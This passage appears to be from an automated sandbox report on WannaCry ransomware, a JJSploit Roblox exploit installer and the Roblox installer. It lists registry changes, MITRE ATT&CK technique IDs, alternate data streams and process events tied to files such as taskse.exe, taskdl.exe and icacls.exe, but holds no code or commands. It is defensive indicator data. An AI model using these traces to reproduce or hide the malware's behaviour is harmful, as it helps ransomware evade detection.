Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JJS-UI.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeWebview2Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
6452	MicrosoftEdgeUpdate.exe
6584	MicrosoftEdgeUpdate.exe
3020	MicrosoftEdgeUpdate.exe

Enumerates system info in registry 2 TTPs 10 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	RobloxPlayerInstaller.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	RobloxPlayerInstaller.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer	RobloxPlayerInstaller.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer	RobloxPlayerInstaller.exe

Modifies Internet Explorer settings 1 TTPs 12 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\PROTOCOLEXECUTE\ROBLOX-PLAYER	RobloxPlayerInstaller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player\WarnOnOpen = "0"	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox	RobloxPlayerInstaller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox\WarnOnOpen = "0"	RobloxPlayerInstaller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio\WarnOnOpen = "0"	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player	RobloxPlayerInstaller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player\WarnOnOpen = "0"	RobloxPlayerInstaller.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox\WarnOnOpen = "0"	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-studio	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\roblox-player	RobloxPlayerInstaller.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\PROTOCOLEXECUTE\ROBLOX	RobloxPlayerInstaller.exe

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	MicrosoftEdgeUpdate.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CredentialDialogMachine.1.0\CLSID\ = "{5F6A18BB-6231-424B-8242-19E5BB94F8ED}"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-studio\ = "URL: Roblox Protocol"	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusSvc.1.0\CLSID	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{60355531-5BFD-45AB-942C-7912628752C7}\ = "IPolicyStatus3"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods\ = "10"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{195A2EB3-21EE-43CA-9F23-93C2C9934E2E}\ = "IApp"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebMachineFallback.1.0\CLSID\ = "{E421557C-0628-43FB-BF2B-7C9F8A4D067C}"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\psmachine_64.dll"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\NumMethods\ = "13"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2603C88B-F971-4167-9DE1-871EE4A3DC84}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\ = "IAppBundle"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\shell\open	RobloxPlayerInstaller.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-studio\shell\open\command\version = "version-1b1a91b0565547cc"	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\NumMethods	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CoreMachineClass\CurVer\ = "MicrosoftEdgeUpdate.CoreMachineClass.1"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9F3F5F5D-721A-4B19-9B5D-69F664C1A591}\VersionIndependentProgID	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebMachine\CLSID	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\ProgID	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\ProgID\ = "MicrosoftEdgeUpdate.Update3COMClassService.1.0"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.171.39\\MicrosoftEdgeUpdateBroker.exe\""	MicrosoftEdgeUpdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\shell	RobloxPlayerInstaller.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FCE48F77-C677-4012-8A1A-54D2E2BC07BD}\NumMethods\ = "4"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\NumMethods	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachine\CurVer\ = "MicrosoftEdgeUpdate.OnDemandCOMClassMachine.1.0"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\ROBLOX-PLAYER\SHELL\OPEN\COMMAND	RobloxPlayerInstaller.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3A49F783-1C7D-4D35-8F63-5C1C206B9B6E}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\ = "Microsoft Edge Update Core Class"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\NumMethods\ = "10"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.PolicyStatusMachine	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\ = "ICoCreateAsyncStatus"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\USER\S-1-5-21-242286936-336880687-2152680090-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebSvc\CLSID	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CoreClass\ = "Microsoft Edge Update Core Class"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\ProgID\ = "MicrosoftEdgeUpdate.CoreMachineClass.1"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\ = "IBrowserHttpRequest2"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F9C80B5-9E50-43C9-887C-7C6412E110DF}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox-player\URL Protocol	RobloxPlayerInstaller.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ = "IProcessLauncher"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\Elevation\Enabled = "1"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachineFallback.1.0\ = "Microsoft Edge Update Legacy On Demand"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\roblox\shell\open\command\ = "\"C:\\Program Files (x86)\\Roblox\\Versions\\version-55d6e65f478642a8\\RobloxPlayerBeta.exe\" %1"	RobloxPlayerInstaller.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\ProxyStubClsid32\ = "{8B15189E-5465-4166-933D-1EABAD9648CB}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A6B716CB-028B-404D-B72C-50E153DD68DA}\ProgID\ = "MicrosoftEdgeUpdate.OnDemandCOMClassSvc.1.0"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.Update3WebSvc\CurVer\ = "MicrosoftEdgeUpdate.Update3WebSvc.1.0"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9F3F5F5D-721A-4B19-9B5D-69F664C1A591}\ProgID\ = "MicrosoftEdgeUpdate.PolicyStatusSvc.1.0"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\NumMethods\ = "12"	MicrosoftEdgeUpdateComRegisterShell64.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4124	reg.exe

NTFS ADS 7 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry-main.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 260445.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\JJSploit_Installer.exe:Zone.Identifier	msedge.exe
File created	C:\Users\Admin\AppData\Local\jjs-ui-updater\installer.exe\:SmartScreen:$DATA	JJSploit_Installer.exe
File created	C:\Users\Admin\AppData\Local\jjs-ui-updater\installer.exe\:Zone.Identifier:$DATA	JJSploit_Installer.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 533420.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\RobloxPlayerInstaller.exe:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2412	msedge.exe
2412	msedge.exe
4100	msedge.exe
4100	msedge.exe
1188	msedge.exe
1188	msedge.exe
1052	identity_helper.exe
1052	identity_helper.exe
3932	msedge.exe
3932	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1864	msedge.exe
1108	msedge.exe
1108	msedge.exe
2400	taskhsvc.exe
2400	taskhsvc.exe
2400	taskhsvc.exe
2400	taskhsvc.exe
2400	taskhsvc.exe
2400	taskhsvc.exe
3372	msedge.exe
3372	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
4132	msedge.exe
4132	msedge.exe
2136	identity_helper.exe
2136	identity_helper.exe
2136	identity_helper.exe
4672	msedge.exe
4672	msedge.exe
236	msedge.exe
236	msedge.exe
236	msedge.exe
236	msedge.exe
2988	msedge.exe
2252	msedge.exe
2252	msedge.exe
4892	JJSploit_Installer.exe
4892	JJSploit_Installer.exe
4892	JJSploit_Installer.exe
4892	JJSploit_Installer.exe
4892	JJSploit_Installer.exe
4892	JJSploit_Installer.exe
4892	JJSploit_Installer.exe
2540	JJS-UI.exe
2540	JJS-UI.exe
3340	JJS-UI.exe
3340	JJS-UI.exe
6724	msedge.exe
6724	msedge.exe
6828	RobloxPlayerInstaller.exe
6828	RobloxPlayerInstaller.exe
2676	MicrosoftEdgeUpdate.exe
2676	MicrosoftEdgeUpdate.exe
1012	JJS-UI.exe
1012	JJS-UI.exe
2676	MicrosoftEdgeUpdate.exe
2676	MicrosoftEdgeUpdate.exe
2676	MicrosoftEdgeUpdate.exe
2676	MicrosoftEdgeUpdate.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
4100	msedge.exe
